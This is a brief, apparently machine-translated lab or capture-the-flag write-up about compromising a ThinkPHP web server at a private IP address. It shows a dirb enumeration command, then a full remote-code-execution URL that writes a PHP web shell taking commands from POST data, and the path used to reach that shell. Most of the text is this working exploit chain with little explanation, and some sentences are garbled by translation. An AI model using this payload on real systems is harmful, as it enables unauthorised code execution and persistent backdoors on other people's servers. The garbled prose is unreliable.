2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Table of contents
Let's blast it first to see if there is any attack path.
Edit and write PHP successfully, simply nday to win Edit
You can try tools such as dirsearch, dirb, gobuster, etc.
dirb http://192.168.20.130/
http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>
http://192.168.20.130/public/shell.php